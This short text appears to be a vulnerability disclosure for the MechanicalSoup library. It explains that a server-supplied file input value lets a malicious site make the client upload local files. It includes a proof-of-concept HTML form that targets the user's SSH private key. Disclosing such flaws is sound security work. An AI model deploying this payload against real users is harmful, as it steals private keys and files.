Cleanup done already. Summary ======= A malicious web server can read arbitrary files on the client using a <input type="file" ...> inside HTML form. Details ======= […] The file path is taken from the bs4 tag "value" attribute. However, this path will default to whatever the server sends. So if a malicious web server were to send something like: <html><body> <form method="post" enctype="multipart/form-data"> <input type="text" name="greeting" value="hello" /> <input type="file" name="evil" value="/home/user/.ssh/id_rsa" /> </form> </body></html> then upon .submit_selected() the mechanicalsoup browser will happily send over the contents of your SSH private key.
Thanks!